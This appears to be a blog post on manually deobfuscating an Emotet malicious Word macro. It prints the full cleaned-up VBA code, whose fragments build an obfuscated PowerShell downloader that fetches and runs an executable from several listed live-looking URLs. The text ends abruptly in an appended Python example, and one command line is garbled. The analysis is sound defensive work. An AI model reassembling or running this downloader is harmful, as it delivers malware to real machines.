Deobfuscating an Emotet MalDoc Script

So this post covers the malicious macro script that was found in an older Emotet write-up of mine, which you can find here. While one could develop tools to help deobfuscate the macro script, as @David Ledbetter did in his blog post, I wanted to show another way of doing it: manually, without any programs or scripts. I wanted to do it this way and document it since I have no talent or skill in developing programs or scripts for this kind of work, and to show those of us who are “code challenged” that it is possible.

The Word document and some of the other artifacts can be found in my previous write-up mentioned above. There are a couple of ways that you can go about getting the malicious macro script(s) itself, but I am covering it using the OfficeMalScanner application.

Open a Command Prompt, and “cd” into the OfficeMalScanner directory. Once you are in that directory, type the following command: OfficeMalScanner.exe info. You should see something like the following screen, indicating that OfficeMalScanner has found macro code and written it to disk (usually in the same directory as the OfficeMalScanner binary).

With OfficeMalScanner having created the script files, we can start to look at them and figure out how the script works. As seen in the screen shot above, 4 files were created, but only 3 of them are the ones we want to focus on (ThisDocument contains nothing of interest). The first script to look at is the one containing the code that runs as soon as the document is opened, via the subroutine called “AutoOpen()”, which can be found in the GvHspFqNb file. What you will notice in this file, and in the other 2 files, is that there is A LOT of code. Don’t let that bother you: it is there to distract an analyst or researcher. A good rule of thumb is to look for any kind of pattern in the script(s), or for things within the code that stand out. After going through these scripts and looking at them for a LONG time, I noticed a pattern in all the scripts, as seen below.

Some other patterns stood out as well:

– In the files called “GvHspFqNb” and “zrUjpXiVR” there is a line break in the code (lines 240 and 325 respectively) with many variables being joined via the “+” (plus) symbol and assigned to a new variable.
— This is not the case in the “jdaJZipYi” file.
– Every function in the scripts is also the target of one of those assignments: the joined-up variables mentioned above are assigned to the function’s own name, which is how a VBA function returns its value.

The easiest way for me to start working through this was to start with the file “GvHspFqNb” and look at the long string in line 239 and see where the variables were being called in the script. For reference in case the line numbers are not the same for you, this is the line I am referring to:

XZGDjkTXd = iXjTfDtwt + MfwkTAlmO + Chr(34) + bdQLj + XcPJwimMDX + dboqFFzRwf + lvhKUmQuZY + XirAlwh + iEskAw + wjzpQ + hwScLdt + ddQwkYCj + nQjKcqjJ + AMUtVpRjYh + bAijVVwcoX + VoVzNUo + lVTntJNhYCV + jDbmziAMH + WpvWYmH + huhtlj + FOUYwvwbpJ + ooqYN + XSXcJLrKhLC + JwSpco + PoBuYhjKsAG + OuwfRiYsL + KIizSLY

Using Notepad++, I searched for the variables from the line above across all open files. The first two (iXjTfDtwt and MfwkTAlmO) are calls to functions in the other scripts, which contain more lines of garbage code (like the GvHspFqNb file). Looking through those files, they have the same pattern I showed in the image above. Looking at some of the other variables in the line of code above, I could see that there were bits of code in them that stood out. Knowing this, and using the pattern from the image above, I started to clean up the files and remove the garbage code. Once everything was cleaned up and all the garbage code was removed, I ended up with this script:

Sub AutoOpen()
	Shell$ XZGDjkTXd, 0
End Sub

Function XZGDjkTXd()
	uwQwD = "lzllvfDiLiYtHEllId[1]'+'+tiQshElL'+'id[13]+3Gjx3Gj)')  -cREplACe  ([cHaR]116+[cHaR]105+[cHaR]81),[cHaR]36-REPLacE'3Gj',[cHaR]39-REPLacE([cHaR]80+[cHaR]66+[cHaR]119),[cHaR]124)) rjnV82tj"
	KIizSLY = Mid(uwQwD, 13, 165)
	
	GUQAYvOLYs = "q1bTYRaFBpDhwEfcJvLV0+'DB+sDBns3Gj+3GjDB+sDBes'+'DB+sDBdists'+'DB+sDBributor.com/sDB+sDBUVR3Gj+3GjJ/,h3Gj+3GjttpsD'+'B+sDB:/sDB+sDB/sDB+sD3N9"
	hwScLdt = Mid(GUQAYvOLYs, 22, 117)
	
	vvkjEGwiSMu = "sGKvLPr'+'EFErence)[1,3]+s3Gj+3GjDBxsDB-JoiNsDBsDB)3Gj+3Gj ((sDBaEsD'+'B+sDB1fsDB+sDBrasDB+sDBnc 3Gj+3Gj= sDB+sDBnewsDB'+'+sDB-sDKdwHo"
	XcPJwimMDX = Mid(vvkjEGwiSMu, 6, 124)
	
	jjGGrIHbYO = "1sDBhvi3Gj+3GjsDB+sDBgps.cosDB+sDBm/h/,sDB+sDBhttp://aj'+'asDB+sDBx3Gj+3GjtusDB+sDBbe.sDB+sDBco3Gj+3GjsDuSGLlTR0BH"
	nQjKcqjJ = Mid(jjGGrIHbYO, 2, 103)
	
	mIoHOJMvnnN = "qsLJLb4Lhu8jB3F1DB-objesDB+sDBct rsDB+sDBasDB+sDBndsDB+sDBosDB+sDBm'+';aE1bsDB+sDBcsDB+sDBd =sDB+sDB DsphsDB+sDBtsDB+sDBtp://sDB+sDBwwsDB+sD3Gj+3Gv9tj7"
	XirAlwh = Mid(mIoHOJMvnnN, 17, 130)
	
	ibfXDEP = "Dn7Rs6O9bKnKbjaZBm.NesDB+sDB'+'3Gj+3GjtsDB+sDB.sDB+sDBWesDB+sDBbCliesDB+sDBnts'+'DB+'+'sDB;sDB+sDBaE1nsDB+sDBsadasdsDB+sDB =s'+'DB+sD3Gj+3GjB sDB+sDBnewsD'+'B+s58fT3WGQ"
	lvhKUmQuZY = Mid(ibfXDEP, 17, 144)
	
	pFtUGf = "uDB+sDB){tr3Gj+3GjysDB+sDB{aE'+'1frsDB+sDBasD'+'B+sDBnsDB+sD1TuJYjDwwa8ODlE8"
	WpvWYmH = Mid(pFtUGf, 2, 58)
	
	vEKVJdvQuP = "1qGKl3lnha3zIT8Bwww.shopnz.in/fg/,sDB+sDBhtsDB+s3Gj+3GjDBtpsDB+sDB://csDB+sDBa'+'bsDB+sDBletvinternet'+'.usDB+sDBs/fFsDB+sDBQiRYu/,httsDB'+'+sDBp://www3Gj'+'+3Gj.sDB+sDBdongho'+'dinsDB+WVabF3HWDrkoEMtMHzGV8"
	ddQwkYCj = Mid(vEKVJdvQuP, 16, 170)
	
	CStArjjz = "msiEWjBw.sDB+sDBmesD3Gj+3GjB+sDBdi3Gj+3GMCP0pjVRfUq0GKdG4WRX8I"
	iEskAw = Mid(CStArjjz, 6, 35)
	
	FjtjpZk = "3ErDqNq32ffmsDB+sDB/DsDB+sDBsp.Split(DssDB'+'+sDBpsDB+sDB,sDB+sDBDsDB+sDBsp)sDB+s'+'DB;aE1karasDB+sDBpasDB+sDBssDB+sD'+'B = sDB+sDBaEsDB+sDB1nssDB+sDBadasd.nsDB+sDBext(sDB+sDB1, 343245);aEsDB+svztTdbB7C2lbtsanq"
	bAijVVwcoX = Mid(FjtjpZk, 13, 181)
	
	iRRziZvtijn = "QWIbzzpIY5XQf9iIYHu[c3Gj+3Giw8Bm4"
	JwSpco = Mid(iRRziZvtijn, 20, 8)
	
	cvlVVcqwil = "Qomwvvzlzem('+'asDB+sDBE1sDB+sDq4F4LZHjJwJwrrHGX50dK3hzm"
	FOUYwvwbpJ = Mid(cvlVVcqwil, 10, 22)
	
	tjLDBw = "zXN6P1I6GNvz9lS2Sz7cFGXunKHlLDB1huas = aE1esDB+sD'+'BnsDB+sDBv:sDB+sDB'+'pubsDB+sDBlsDB+sDBic sDB+sDB3Gj+3Gj+sDB+sDB DspsDB+sDB7H5'+'3Gj+3Gj'+'Dsp + aE1karapsDB+sDBas + s3Gj+3GjDB+sDBDsDB+sDBssDB+sDBp.exeDsp;sDB+sDBfosDB+PawImc"
	VoVzNUo = Mid(tjLDBw, 30, 192)
	
	wcspHsisr = "QDBc.sDB+sDBDownlsDB+sDB3Gj+'+'3GjoadFisDB+sDBlsDB+sDBe(aEsDB+sDB1asDB+sDBb'+'c.TsDB+sDBoStsDB+sD'+'BrisDB+sDBng(), aE1'+'huasDB+sDB'+'s);InsDB+3Gj+3'+'GjsDBvoke-ItsDB+sDB'+'1IwzwdpjJI3ApaM0ljw2DEIBEaJwrws4q3rdJG"
	huhtlj = Mid(wcspHsisr, 2, 173)
	
	Uzmwv = "IIiMXQODYXoAcsDBreachsDB+sDBl8R"
	lVTntJNhYCV = Mid(Uzmwv, 14, 15)
	
	jWjwjc = "RVllKPQUrvzisDB3Gj,[CHar]39)PBw .( tiQS9IJ"
	OuwfRiYsL = Mid(jWjwjc, 13, 27)
	
	NOYMJnY = "EuwI8L4vbOwJUUFqB+sD3G'+'j+3GjBm/tFsDB+sDBUIADPM4T6mz0E"
	AMUtVpRjYh = Mid(NOYMJnY, 17, 31)
	
	iEuqdSpLN = "9l9B'+'hsDB+sDBua'+'s)sDB+sDB;breasDB'+'+sDBk3Gj+3Gj;}catsDB+sDBch{wsDB+'+'sDBr3Gj+3GjisDB+sDBte-host aE1_.ExsDB+sDBceptionsDB+s'+'DB.sDB+sDBMessagesDB'+mSPrbFo7nGhnjV"
	ooqYN = Mid(iEuqdSpLN, 4, 150)
	
	oVfQLlUnd = "dVoBAdjHAr]55+[cHAr]72+[cHAr]53Gj+3Gj3),sDBzT2sDB'+').REpLacE(sDBaE1sDB,3Gj+3GjsDBmQes3Gj+3G'+'jDB) '+')3Gj) -cREpLaCe3GjmQe3Gj,'+'[CHar'+']36 -REplAce  3Gj'+'zT23Gj,[CHar]92 -REplAce 3GjTY8d7Jt4I6iFGR622N844jFaq"
	PoBuYhjKsAG = Mid(oVfQLlUnd, 7, 181)
	
	wYadCoTYO = "pslPESXKj(aE'+'1sDB+sDBasDB+sDBbc in aE1sDB+sDBbcds'+'io"
	jDbmziAMH = Mid(wYadCoTYO, 10, 45)
	
	APwTzEijQ = "aR5zHADU74lmhJSIPA& ( $ENv:COmSpeC[4,26,25]-Join'')( ((' ((3Gj & ( ([sTriNG]mQever'+'BoseDjQA65Cjd"
	bdQLj = Mid(APwTzEijQ, 19, 71)
	
	MCCmqvzB = "3n2EUwfOlUc6'+sDB;}}sDB).REpLacE(sDBDspsDB,['+'s'+'trI'+'ng][cH3Gj+3GjAr]39).REpLacE((bvIHfHz0cBT4dbGL3"
	XSXcJLrKhLC = Mid(MCCmqvzB, 13, 74)
	
	miGKlqHBFR = "QsQWU4B+sDBosD'+'B+3Gj+3GjsDBbje3Gj+3GjcsDB+sDBtsDB+sDB SystesDB+sDJDW3sNNwQOCjmh4jjaz"
	dboqFFzRwf = Mid(miGKlqHBFR, 7, 61)
	
	cuTLAlvCH = "L1Q5aMYp2cjcis'5iBQsIdD"
	wjzpQ = Mid(cuTLAlvCH, 11, 5)
	
	XZGDjkTXd = iXjTfDtwt + MfwkTAlmO + Chr(34) + bdQLj + XcPJwimMDX + dboqFFzRwf + lvhKUmQuZY + XirAlwh + iEskAw + wjzpQ + hwScLdt + ddQwkYCj + nQjKcqjJ + AMUtVpRjYh + bAijVVwcoX + VoVzNUo + lVTntJNhYCV + jDbmziAMH + WpvWYmH + huhtlj + FOUYwvwbpJ + ooqYN + XSXcJLrKhLC + JwSpco + PoBuYhjKsAG + OuwfRiYsL + KIizSLY
End Function

Function iXjTfDtwt()
	VdqQFBNou = "IwoXsiX  %RkhrYqacdtJELoHE"
	EZZCzll = Mid(VdqQFBNou, 8, 3)
	
	NRiKjBd = "jIBz wmXwEPjVsVhbWSlFooPz"
	XjGMbX = Mid(NRiKjBd, 5, 3)
	
	jINXG = "uwGVvWRqtJzMFWrAFfWBQzUdiVvoEZALE"
	owOtZHOiRj = Mid(jINXG, 24, 1)
	
	wkioikmkLcH = "KhObrhAZnYopWrQvOUcsnwO cSlr"
	VqGVJBmXd = Mid(wkioikmkLcH, 24, 1)
	
	vQrVszIqv = "iWbsYzYTPN FizCwwGNoErhvKotNamU"
	zEwju = Mid(vQrVszIqv, 11, 1)
	
	vVwnK = "UDOLKvTqLaNqwDYTqbhCBF  NGuYNfGFhz"
	RbXSjaRS = Mid(vVwnK, 23, 2)
	
	rEINGi = "YBNwPJcomXtYPjj"
	coRNqDLJYj = Mid(rEINGi, 7, 3)
	
	zJRzaFJ = "vEvw  wLQCkHwzHwSoqGzViFGzMsYIiG"
	BmXwbzrCJc = Mid(zJRzaFJ, 5, 2)
	
	oTTXw = "sipulGqhaHTGQ wjDcDowFqVuzlJuwncnhl"
	XwEsds = Mid(oTTXw, 14, 1)
	
	ilUHvwa = "czwOLMhSDFJMQhzVH   LnlZjlPGIYvuKoi"
	vWpfvFiJL = Mid(ilUHvwa, 18, 3)
	
	YhWGcJuwrqt = "WanfiuipBRVI jBIwzOAXku"
	BucHkjAD = Mid(YhWGcJuwrqt, 13, 1)
	
	wWnwiO = "oYDFWIfYz   b EdXcjBAjbzhLzhbNEwhSV"
	YcXODn = Mid(wWnwiO, 10, 3)

	WiCwBdJbNKX = "kJFCIChtEsFBOdvlZVY/ctJvKYticfW"
	tosGq = Mid(WiCwBdJbNKX, 20, 2)
	
	RPIcQw = "EtWtzWNzuzYIjiLfOSBHFPhYbNNJKX%vKGlA"
	TszAzmdib = Mid(RPIcQw, 31, 1)
	
	SizGkn = "owIpTJjRzuWYVVEwCDsCmfYEDnJhbNQsjisphffqz"
	LKRtazc = Mid(SizGkn, 35, 2)
	
	UYAiXmVUu = "Fq& mXfvZEwidzwEXiqZuwowNGYEOihuwRVavf"
	cJXiu = Mid(UYAiXmVUu, 3, 2)
	
	dGlbHjfZM = "hwIRUoUdIRFWQLZVDcSsIwwtdiKhSfZ  JzzwEIlw"
	uiCiVCWEEmt = Mid(dGlbHjfZM, 32, 2)
	
	GTiaJsr = "fGmIXBIidDzOIOEQqU suuArSTRPHECjkUrMEAt"
	RtNidJFco = Mid(GTiaJsr, 19, 1)
	
	jIKHF = "ZcdV TcwYGzLHbXoO"
	qaHiavBP = Mid(jIKHF, 5, 1)
	
	GWXbicWYGw = "LDzmYrjiJXdiJUsJqYA/v VUicHAEVmAc"
	LTUEMHjBFs = Mid(GWXbicWYGw, 20, 3)
	
	MiWSNwv = "wurzllpNBMvFvIckT rUqwtclYj"
	nFKKNhrtJRK = Mid(MiWSNwv, 18, 1)
	
	PzuvjCDQzW = "EmwhmqecYVzZ"
	mFaZJRmuLkB = Mid(PzuvjCDQzW, 7, 2)
	
	blAaU = "wwEGpipIQrMKdPCGIticqGTbMSozEOvUjn"
	FbWLohdXrpi = Mid(blAaU, 19, 2)
	
	isXEXFLorRp = "D YOcYAOTZSnUUhdoHzIjoBFhwjnMwX"
	jbwlJG = Mid(isXEXFLorRp, 2, 1)
	
	PwEKJOVfM = "Th CMViCGJQXv"
	HmfYARE = Mid(PwEKJOVfM, 3, 1)
	
	JkWkhJTiW = "ViqzcmlMWWjzvIRjuhfDkTEp"
	KPjmW = Mid(JkWkhJTiW, 5, 2)
	
	GfoViwNwXoF = "dTEfOG  jWmYEqL"
	kWCYnw = Mid(GfoViwNwXoF, 7, 2)
	
	ukFcXMsv = "zdkdVvXl BHruZHvp"
	VAiTA = Mid(ukFcXMsv, 9, 1)
	
	CWwutmJnz = "KvfkOrtIrIQLbfVvjEcV  dvTo"
	ZQLPiKfP = Mid(CWwutmJnz, 21, 2)
	
	iXjTfDtwt = KPjmW + owOtZHOiRj + BmXwbzrCJc + XjGMbX + FbWLohdXrpi + HmfYARE + RtNidJFco + VqGVJBmXd + cJXiu + EZZCzll + coRNqDLJYj + LKRtazc + mFaZJRmuLkB + TszAzmdib + XwEsds + ZQLPiKfP + uiCiVCWEEmt + qaHiavBP + VAiTA + LTUEMHjBFs + YcXODn + BucHkjAD + zEwju + jbwlJG + nFKKNhrtJRK + tosGq + RbXSjaRS + kWCYnw + vWpfvFiJL
End Function

Function MfwkTAlmO()
	IJSiMpijJz = "4RHj9LozHLNTRkDGMbVKzKzpjIBCBZduZNJrWCUaQjclBPO64RSzLmQ"
	hTCqCrmXhZa = Mid(IJSiMpijJz, 6, 36)
	
	XldjkNXGr = "W4Aj53zWphQSC4jCNFFJzHH5r5rZrJYsCXYTQzwwMKhIGXJmwiiStDaLkKGvtaToQoFidhIizdAzJNwwQibJbGwdRvTwv"
	JQtkV = Mid(XldjkNXGr, 28, 60)
	
	LITPNo = "XU9bvHYv0cBQWBEmUVwHjOJIUSwInTMVCOUSCBujlOfkOntrfIIDaYjPDwGJazjlHpOIhmkSbNVUjYuhZGdiKJudfEOFvkIoitdYZkJtYqbNDOjfBZjUUBawukcdYiXqEjmpvWHowjGUhhaRXiEVAoUhTidoIjUtSlIWbzla1vGSlz"
	LLwXaki = Mid(LITPNo, 12, 154)
	
	YsVYb = "E4iAanRQuicszLmbbnHlsUzcKAFJwRVHsAFwTQQvHlzsZKUlhziaquPnzaWEcGTcIUAwGpHLWLiGXFDAjTbzjuQwkSwttMSARUjEKXispXEfPJPuWWXIfUtNEBLosNRJsioDWwqIojJMqkibCCWXoKUzaVAIMqzbFumlUMYYjPTvVDmfaz"
	pAumPWpDqZt = Mid(YsVYb, 8, 165)
	
	ibWTaVU = "UXtrdwwMjGsBCmrtrSRfIQZEVQDbCWNJiOwKNKpHhQzClwaOHQWiilWKjWlivVKMsiWoojjjcKzrSXSYqpTmAjftsnaqZHLMGlJCZmZbjpBUnirMEMrGBYLIDdvAGqHVzllhNPwDPsCLiLFOwO723Qk3WzlrnfQBtjwuz"
	BRbwaiW = Mid(ibWTaVU, 6, 141)
	
	wqtPcjI = "DkvQjkrPMhjs9T"
	OajKQiMVz = Mid(wqtPcjI, 11, 1)
	
	AJCVXBj = "vGi0SctjhDlEDAzFMasjGiiHcRGoIsptAwEKdVCpHXPvQHVdczUONjYbuYfAWFXpOsEHwnbqXDZjPjrUwcMIXbfUXcQFqBTCzahYDOhpYdqKGpMKjKEttORmMjjTWVAVjXjoCTQhvXktkVNhQFYjzZJlJuLTiNSCdUbjFXINtWwVdXCrWBCRzTYJNwfHHzChEiQcjoL0mLIwE"
	NwbTPTJck = Mid(AJCVXBj, 5, 191)
	
	UjAwF = "U1vc2AX4j1QGYNmPZDTlUDSXjlnHoMsCBrohXrtWwLfrLkHwMjndSwZjQQoTXdLwnOEhZErhKzoJXbMvirvHYOjDSERHDZzTAjEwjaXHpGTVKQMpEtpjiDXYiBOUnkilzVIoWPPDTY6r"
	lwwfAvrvaKA = Mid(UjAwF, 11, 127)
	
	kbknmH = "oH8MVzGlZYolmbRMMwhiLoXbrjKwwNjmwsFsjj1XQ"
	lwoiKVvn = Mid(kbknmH, 6, 27)
	
	LtKqoNaQBjv = "z4vWuqkfRvXkvFRNKLFpaCqQMFWQsTjQOMBvYDphwYDFQjlNNQiwafSQvrKWTTmwOHViDVoGVYqBwkAcTJCbojqjtlAjtSNilFrJNDJsbYaCoRSKrhDKRLJiQmqiZi897QBQ"
	PJWGNzsnTo = Mid(LtKqoNaQBjv, 6, 117)
	
	BiqUYbtU = "zQvGSd5Bf2rZwUHcZJNPEcfAnvbJVIZICJGUDFFZMPwzXDpnHJwDOhwAzEvVNBDZzVWnNmYTD6On333CuuVQf4Ykd9Mb35CI"
	QCjlpW = Mid(BiqUYbtU, 12, 62)
	
	YzzUw = "jQWGFwZqdnORPtwBqIjwDrqVBiGAuHMhhXutdrZsscNRjIKzIJYHcoMFqBFXqZwWbhkrzCYzinDadZosYIrkiEFsLoDclCBTjrpzYSXnLHSLjl55N6zdCR"
	NSdXNpGrzmH = Mid(YzzUw, 3, 100)
	
	ocCskfsi = "FP06Fa4oDpjfdkGnBLJWuUKGXzKkMLMXCBjCaVlizaiJUSaLPazrPabCcHPYJTbqzATXzpZvqjJkVV"
	HSVoC = Mid(ocCskfsi, 8, 56)
	
	CvYHzJDD = "uiW9GEkOlIsjalPkUASoWzroXZioDjirActQtWsmWGZffoXjRVCTStipzuGhVwLBdAfzrwrwHjRQYMIjBCWhhLZHuETwQKQZuYCfIZoTiDLmbRRllXjTZiTSbXDnfsizPrVAKdabNDCdzmjcnhNtiwAQEkDkWBomVOWjwRbHwEGWcpSorazzipSTrFvaZqELPPIlQzB9XUS9pQ"
	hwbkklnwO = Mid(CvYHzJDD, 5, 194)
	
	GvkzX = "CFncjwzjhFHwbrzfdqSoHEHjZZQRwsTfEGvhuJPVcADXsuHbsoPdYGLUwGCHhjnqmA8mWXEQWMa2TuBPI9IHmZ"
	avQTGO = Mid(GvkzX, 4, 60)
	
	VvHrC = "85ZL10F8mUV8FfombrUwQkTazMGBkqfRpZHdqHzuainGInvNOlRCmibDvDbuETOQXqsGfLwUtaWhzNRJQtmzZciKzDhmfDpHUXjRvoiDpwIMItGilSiLhPquLiY4KRH0QjfcVub"
	GwzqV = Mid(VvHrC, 15, 108)
	
	YjhQMhKPJ = "qq09kPZQhnJjjumjoUFLlzIfdqd1"
	OKiwmvjVqu = Mid(YjhQMhKPJ, 13, 12)
	
	EVLBiDVB = "14CVOQ7WpSUHNCKLQstqPQzJzQJoucSppLPDNawMsbOqYTKXrdAaRASnLHLsVcsMziSBnHzpvjwnCIljFlwQbsYoscsGPDrPiBrtBJkkfLilCikCVfnjfbkGGdJKPrasoiFARsiwAMlQOmmNrpkjQHkHQkmXzZUnklwTZkkcAqiTpUsTrvTZGq6wut"
	JiqhzRHcFB = Mid(EVLBiDVB, 9, 174)
	
	MYYTUH = "m4BLCBcNmNPELhZAzwrZVtijUCtJwoOorJVAasXjErEtFuaDINQCMpXJdCqDUmPwzbNCLYaGYKVdpobZcqBlXLbClMXYBUMRcFudhYrjmJdCTuToaQbikdanALQzBCFEwDAjtzsEzRzNiYirsizlthhwfHdWHsikEZEPtkvdYXfSiMFbcYGTFTLziC4pfTZL"
	zYNHlYddIz = Mid(MYYTUH, 9, 175)
	
	oHFCX = "mGPsdJdbDDMjafXUpBlEYwVmLUHbadaSGMVfwmj7hQTBmhwPccsjw5"
	nULGrjckiH = Mid(oHFCX, 4, 36)
	
	PUjfCHhVSAi = "AqzQYlLhXTSjlqruUiJrcAwhwwkhGvwzGpdwrZqZlszjpcEIkLaEbdkXawSVKdbcVVcwNsDusjFjCRrTtcwuVuVdFFXsHUOHRVLUzIvrIfLsXAVIHzcihjGbzzqHVKnXUwRjFXUkhEmpidaXT2"
	VokiKdBLhMG = Mid(PUjfCHhVSAi, 7, 136)
	
	wuiVz = "rJbiJpqkONZizNbKjJdUSBDwzBMYiaFhoGNfGYjHsuORiUtHdw99ACVZ"
	vfXjdA = Mid(wuiVz, 2, 39)
		
	dwjQFnHSG = "TrYdhFml3jbHFsV4YTlZGDjkTXd%=V2"
	Dvijf = Mid(dwjQFnHSG, 20, 10)
	
	mYllC = "DsMkWiqGbIFFTnizAwmPrmTQv"
	ziRjVOmWMK = Mid(mYllC, 2, 5)
	
	kRkSsadNq = "YQLTbX3860h3G1fvJ1ZaiLzHk"
	tHTZAGq = Mid(kRkSsadNq, 3, 4)
	
	ioinjjXbknZ = "i74cPMNHscvRzmT8wHFLobpqp %fwbPvzwZRT8"
	tGDFZjErW = Mid(ioinjjXbknZ, 26, 11)
	
	sBdikZIHPUP = "ooWszRfBOa&&!%ff1PXGvrWsE3"
	AzlILsjAY = Mid(sBdikZIHPUP, 6, 10)
	
	QENcwftH = "zriMOzzAAsbLA&&setjfz6d4c80K26pj36"
	QXPohv = Mid(QENcwftH, 6, 13)
	
	TJfZaJMJ = "AZjbDJzZoGz3Q9MhocUu"
	ZjfzoE = Mid(TJfZaJMJ, 16, 1)
	
	oSEDt = "JTAqAU4zV69dw1JASJ44TcMoVHN0637shHprqLp5f"
	zCdSXAjaRIW = Mid(oSEDt, 21, 3)
	
	viFUUD = "1fcset %mwIN84IKDJAqjrj"
	mjoMCELKTrL = Mid(viFUUD, 4, 6)

	bFQsh = "DpznjkZU6Dv80HsPTiiASUTiUfGLTb&&set %XhLVVUl3N1oljoj"
	wzdXMPnbq = Mid(bFQsh, 25, 14)
	
	wZXURK = "Cz0O2MW2N^h^e^jn"
	OKqdMXNZ = Mid(wZXURK, 10, 5)
	
	DmVPjfKZu = "t6LwIEKw%=zUtPdpzzbLHnkvdkAv"
	AYzqBm = Mid(DmVPjfKZu, 3, 9)
	
	bZIuccY = "HQEr7wYvX3RBIMTS8SnQapnVM8kDrO5wPmwM"
	PQrKcSXml = Mid(bZIuccY, 34, 1)
	
	TOKsLq = "Yql^Hm7GmQJAvlS"
	WbUVj = Mid(TOKsLq, 3, 2)
	
	sSMZQ = "L7sU58qTozMmVOmbRzBfTzcJhMGFcj94KQKtz"
	jILCihziF = Mid(sSMZQ, 8, 14)
	
	bfinkhFLK = "riHkHtnHvKLYStWY%XZGDjkm39V"
	tAqPRYum = Mid(bfinkhFLK, 17, 7)
	
	pWNXGYiJhKi = "NoMJpqY%=qEIKFtDqWTbFVM0vH8N6FHjqnUj"
	uRwGYfEkAQZ = Mid(pWNXGYiJhKi, 7, 13)
	
	GWiWiVYzSfJ = "QzjaoqRfvqCsrNN85nmr9set %LGsjYr8ml"
	LmdISa = Mid(GWiWiVYzSfJ, 22, 11)
	
	ruqCwOEGXzd = "niqPuPUVf6omv7LzR1iWLTQXPtEpNwaoc"
	XJnwOGUWo = Mid(ruqCwOEGXzd, 29, 3)
	
	hYwZzrSbGTi = "7bI3SzF4M&set %JLUTltY0mdswojE68qbfIzjVm3i"
	Nbqjo = Mid(hYwZzrSbGTi, 10, 9)
	
	JpuoU = "fhZr1HcDwK39HuQrj0UNToqGQTQTrs4l&&set %ikv1Qu8Jm"
	PArdvDKi = Mid(JpuoU, 32, 11)
	
	tzPsNvm = "dVOwI1bzMX^e^5kI4"
	NIzzFOGqLj = Mid(tzPsNvm, 11, 3)
	
	OWSOfo = "0Hzafz6N4pAMzz1o8tCHqp17cTsDVE"
	TwAIIIK = Mid(OWSOfo, 27, 2)
	
	ifmtXr = "U3n4bWU04YL%=p&zPudO3hZt"
	vAdNYSUc = Mid(ifmtXr, 12, 4)
	
	AvAnQ = "GRnLYi4j29kct%=oZiBdA3wMdk"
	BnHlmrzFM = Mid(AvAnQ, 11, 6)
	
	OwhUDKSWiC = "uG6pmLC7MY1FGJMjiM&Ar"
	rEITZa = Mid(OwhUDKSWiC, 19, 1)
	
	OLhwVWKvRdH = "C6HA7ZPPHzmWS5zOJkMTZWpApXrRlFuop%=LvG"
	zjPpC = Mid(OLhwVWKvRdH, 27, 9)
	
	YqQPkwWw = "M3rwAkXzU3puHokpjKAdFFmVt3EvlrWdzjLqWzuV"
	XktLqwnUdJs = Mid(YqQPkwWw, 12, 9)
	
	CjamG = "FKYRQ8z&PD7Zn"
	MiOKmrq = Mid(CjamG, 8, 1)
	
	upVJZ = "TmtzSu9To7jH6bOMrXBVTWAzGAozkRBjM7Y"
	zwILaa = Mid(upVJZ, 25, 1)
	
	tDrjnvszL = "3s7mnV1NWlfq1z%=EoRfENrKH"
	RBiKzcMija = Mid(tDrjnvszL, 15, 7)
	
	ppPhwr = "9fFTXd%!  pIfRInF"
	JhpSDwZBpn = Mid(ppPhwr, 4, 7)
	
	fkWowkJUAN = "qozL9uQ^s&&8WFS8K"
	zPHmjXKv = Mid(fkWowkJUAN, 8, 4)
	
	CNMIOGIlb = "N57iu36MEwHqHwrRJzjTfq3Ln1ozYiM4EqZpn85q"
	YzpiHzb = Mid(CNMIOGIlb, 15, 1)
	
	hbACHzwL = "r43cw93^wrhT2"
	IPKtqi = Mid(hbACHzwL, 8, 2)
	
	HwUbDwiRclw = "f1IirzJRpwbPvzwZR%!hJtl"
	BoEMQYon = Mid(HwUbDwiRclw, 10, 10)
	
	IEGwja = "nXWhGct%!!DYXdRS69vFQnT"
	jbFjTiZNRkS = Mid(IEGwja, 6, 5)
	
	TSCAMUJiE = "PNJA!%JLUNwakz2zNZKH3Vctq3"
	tXLmomKw = Mid(TSCAMUJiE, 5, 9)
	
	wbtAEkvBCk = "O1ksTzSzIfzN71Tnf3VHA6AFwJbBYLjv"
	LpoVBRpKp = Mid(wbtAEkvBCk, 9, 2)
	
	ThrcBzTwSc = "DQhz5uALtYr6LpDSrd4NvmHVs1dfr8lLojUGMqf"
	bPjIiIIiID = Mid(ThrcBzTwSc, 15, 2)
	
	FtVBsI = "0ucHTFSCmY5set %cjfjVtL33SiYF7qStpNwSP"
	HXCidB = Mid(FtVBsI, 12, 9)
	
	GzsLibALziw = "URHXCGBpWi7KFo"
	tTLwwzjCi = Mid(GzsLibALziw, 2, 1)
	
	MfwkTAlmO = mjoMCELKTrL + jILCihziF + RBiKzcMija + tHTZAGq + rEITZa + Nbqjo + XJnwOGUWo + BnHlmrzFM + IPKtqi + NIzzFOGqLj + YzpiHzb + zPHmjXKv + LmdISa + zCdSXAjaRIW + AYzqBm + QXPohv + tGDFZjErW + vAdNYSUc + MiOKmrq + HXCidB + zwILaa + ZjfzoE + bPjIiIIiID + zjPpC + XktLqwnUdJs + wzdXMPnbq + Dvijf + OKqdMXNZ + WbUVj + PArdvDKi + TwAIIIK + ziRjVOmWMK + LpoVBRpKp + tTLwwzjCi + PQrKcSXml + uRwGYfEkAQZ + AzlILsjAY + BoEMQYon + tXLmomKw + jbFjTiZNRkS + tAqPRYum + JhpSDwZBpn
End Function

So the above code is using the “MID” function on each padded string variable: Mid(string, start, length) takes a 1-based start position and a length, and returns that slice of the string. Each slice is assigned to a new variable. The slices are then joined with the “+” sign and the result is assigned to the function’s own name, which is the function’s return value. The main function is “XZGDjkTXd”, which is where the other two functions get called from.

So now that we have the cleaned up code and it is somewhat readable, it is time for the next step: run the code through “WSCRIPT” on the Windows VM to see what the script decodes to. To do that, all you need to do is append “wscript.echo (XZGDjkTXd)” at the end of the cleaned up code. The reason we echo “XZGDjkTXd” is that it holds the final “put back together” command. I saved that file as .vbs so I could run it. Now open a new command prompt (if you closed the one from above) and run the following command to create the “put back together” file: cscript .vbs > > .log. This redirects the output of “cscript” into a new file instead of printing it to the screen. Once you have done that, you should see the newly created script file, which is still obfuscated, as seen below (cleaned up a bit for ease of reading).
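The same “put back together” step can be done off the Windows VM with a small interpreter for just the VBA constructs the cleaned-up macro uses (string literals, Mid, Chr, “+” joins, and bare function names as calls). This is an added example, not the author’s code or the page’s macro: it runs on a constructed, benign macro of the same shape, and every name in that sample is made up.

```python
import re

# Constructed macro in the same shape as the cleaned-up script on this page:
# a Function per fragment, Mid() slices of junk-padded literals, Chr() and "+" joins.
# Names and strings are made up; this is not the page's macro.
SAMPLE_VBA = '''
Sub AutoOpen()
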